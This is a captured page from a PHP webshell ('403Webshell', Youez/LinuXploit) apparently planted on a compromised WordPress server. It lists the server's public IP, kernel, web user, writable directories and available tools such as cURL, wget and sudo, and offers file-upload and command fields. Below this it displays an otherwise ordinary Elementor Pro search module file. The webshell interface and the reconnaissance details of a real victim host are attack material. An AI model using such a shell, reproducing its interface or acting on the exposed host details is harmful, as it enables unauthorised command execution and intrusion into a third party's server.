403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.0
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/yme/wp-content/plugins/elementor-pro/modules/search/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/yme/wp-content/plugins/elementor-pro/modules/search/module.php
<?php
namespace ElementorPro\Modules\Search;

use Elementor\Utils;
use ElementorPro\Core\Utils as Pro_Utils;
use ElementorPro\Base\Module_Base;
use ElementorPro\Modules\Search\Data\Controller;
use ElementorPro\Modules\QueryControl\Classes\Elementor_Post_Query;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

class Module extends Module_Base {

	const FEATURE_ID = 'search';

	public function __construct() {
		parent::__construct();

		add_action( 'elementor/frontend/after_register_styles', [ $this, 'register_styles' ] );
		add_action( 'pre_get_posts', [ $this, 'set_query' ] );
		add_filter( 'elementor_pro/editor/localize_settings', [ $this, 'add_localize_data' ] );

		new Controller();
	}

	public function get_name() {
		return self::FEATURE_ID;
	}

	protected function get_widgets() {
		return [ 'Search' ];
	}

	/**
	 * Get the base URL for assets.
	 *
	 * @return string
	 */
	public function get_assets_base_url(): string {
		return ELEMENTOR_PRO_URL;
	}

	/**
	 * Register styles.
	 *
	 * At build time, Elementor compiles `/modules/search/assets/scss/frontend.scss`
	 * to `/assets/css/widget-search.min.css`.
	 *
	 * @return void
	 */
	public function register_styles() {
		wp_register_style(
			'widget-search',
			$this->get_css_assets_url( 'widget-search', null, true, true ),
			[ 'elementor-frontend' ],
			ELEMENTOR_PRO_VERSION
		);
	}

	public function add_localize_data( $config ) {

		$config['eSearch'] = [
			'nonce' => wp_create_nonce( 'wp_rest' ),
		];

		return $config;
	}

	public function set_query( $query ) {
		$e_search_props = Utils::get_super_global_value( $_GET, 'e_search_props' );
		$search_term = Utils::get_super_global_value( $_GET, 's' );

		if ( empty( $e_search_props ) || ! isset( $search_term ) || is_admin() || ! $query->is_main_query() ) {
			return;
		}

		$formatted_query_vars = $this->get_query_based_on_widget_props( $e_search_props );

		if ( ! $formatted_query_vars ) {
			return;
		}

		foreach ( $formatted_query_vars as $key => $value ) {
			$query->set( $key, $value );
		}
	}

	private function get_query_based_on_widget_props( $e_search_props ) {
		list( $widget_id, $post_id ) = explode( '-', $e_search_props );
		$widget_instance = Pro_Utils::create_widget_instance_from_db( $post_id, $widget_id );

		if ( ! $widget_instance ) {
			return null;
		}

		$query_vars = ( new Elementor_Post_Query( $widget_instance, 'search_query' ) )->get_query_args();
		$query_vars['posts_per_page'] = -1;

		return $query_vars;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit